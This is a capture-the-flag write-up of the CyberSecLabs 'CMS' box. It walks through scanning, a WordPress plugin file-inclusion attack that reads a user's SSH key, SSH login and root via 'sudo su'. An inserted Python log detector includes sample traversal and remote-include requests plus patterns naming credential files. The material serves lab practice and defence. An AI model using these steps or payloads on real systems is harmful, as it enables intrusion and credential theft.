CyberSecLabs - CMS

udpine
Jul 4, 2020

For my second write-up, I bring to you another box from CyberSecLabs called CMS. This is another beginner lab with some pretty simple exploitation. Let’s dive right in, shall we?

Nmap is always my first step in enumeration. We can see that only two ports are open: 22, which is SSH, and 80, which is an HTTP server.

nmap -sC -sV -T4 -v -O 172.31.1.8 -oN nmap-all-ports

We can see that the server is running WordPress on port 80, and there is a great, well-known tool to enumerate this further.

WPScan is a multi-purpose WordPress scanner that we will use to enumerate the plugins the site is using, as well as interesting paths.

wpscan --url 172.31.1.8
wp-with-spritz is an exploitable plug-in

This plug-in comes with an RFI (remote file inclusion) exploit that lets us view files on the system.

Using the HTTP payload I found on exploit-db, appended with the path to angel’s SSH key (a path he so kindly told us in his blog), we were able to view the id_rsa key.

All we needed to do was fix the key’s formatting and change its permissions so that we could use it to SSH onto the box.
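From the defender’s side, the file read described above leaves a clear trace in the web server log: a request to a plugin path whose parameter value contains directory traversal, a sensitive filename such as an SSH key, or a remote URL. The following detector is an added example, not code from the original post; it parses Apache/nginx combined-format lines and flags such requests. The log lines are constructed, and the script and parameter names under the plugin directory are placeholders, not the plugin’s real ones.

```python
import re
from urllib.parse import unquote, urlsplit, parse_qsl
# Apache/nginx "combined" format: client, timestamp, request line, status, size, referer, agent.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (?P<target>\S+) [^"]*" (?P<status>\d{3}) ')
PLUGIN_RE = re.compile(r'^/wp-content/plugins/(?P<plugin>[^/]+)/')
TRAVERSAL_RE = re.compile(r'\.\.[/\\]')
REMOTE_RE = re.compile(r'^(https?|ftp|php|data|expect):', re.IGNORECASE)
SENSITIVE_RE = re.compile(r'/etc/(passwd|shadow)|\.ssh/id_[a-z0-9]+|wp-config\.php', re.IGNORECASE)

# Constructed sample lines (not from the original post). PLACEHOLDER.php and the "src"
# parameter stand in for the plugin's real script and parameter names.
SAMPLE_LOG = """\
198.51.100.7 - - [04/Jul/2020:10:02:11 +0000] "GET /wp-content/plugins/wp-with-spritz/PLACEHOLDER.php?src=../../../../../home/angel/.ssh/id_rsa HTTP/1.1" 200 1679 "-" "curl/7.68.0"
198.51.100.7 - - [04/Jul/2020:10:02:30 +0000] "GET /wp-content/plugins/wp-with-spritz/PLACEHOLDER.php?src=http://198.51.100.7/x.txt HTTP/1.1" 200 90 "-" "curl/7.68.0"
203.0.113.20 - - [04/Jul/2020:10:03:00 +0000] "GET /?s=hello HTTP/1.1" 200 7100 "-" "Mozilla/5.0"
"""

def inspect_request(target):
    """Return the set of file-inclusion indicators found in one request target."""
    indicators = set()
    for _, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        value = unquote(value)  # parse_qsl decoded once; decode again to catch double encoding
        if TRAVERSAL_RE.search(value):
            indicators.add('traversal')
        if REMOTE_RE.match(value):
            indicators.add('remote_include')
        if SENSITIVE_RE.search(value):
            indicators.add('sensitive_file')
    return indicators

def analyze_log(text):
    """Parse combined-format lines and report requests that look like LFI/RFI attempts."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        indicators = inspect_request(m['target'])
        if not indicators:
            continue
        path = urlsplit(m['target']).path
        pm = PLUGIN_RE.match(path)
        findings.append({'ip': m['ip'], 'path': path, 'plugin': pm['plugin'] if pm else None,
                         'status': int(m['status']), 'indicators': sorted(indicators)})
    return findings

if __name__ == '__main__':
    for f in analyze_log(SAMPLE_LOG):
        print(f"{f['ip']} -> {f['path']} plugin={f['plugin']} status={f['status']} {f['indicators']}")
```

A flagged request that returned 200 with a non-trivial response size is the one to escalate, since that is what a successful key read looks like; the fix is to update or remove the vulnerable plugin and keep private keys out of the web server's readable paths.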

ssh -i angels-id_rsa angel@172.31.1.8

Boom! We have le shell.

From the user shell, privilege escalation is quite easy, and there are multiple ways to go about it.

sudo -l

This shows us that we can run any command as the root user with no password. Easy! I decided to use a simple one-line command to escalate privileges to root.

sudo su

And that’s all folks!
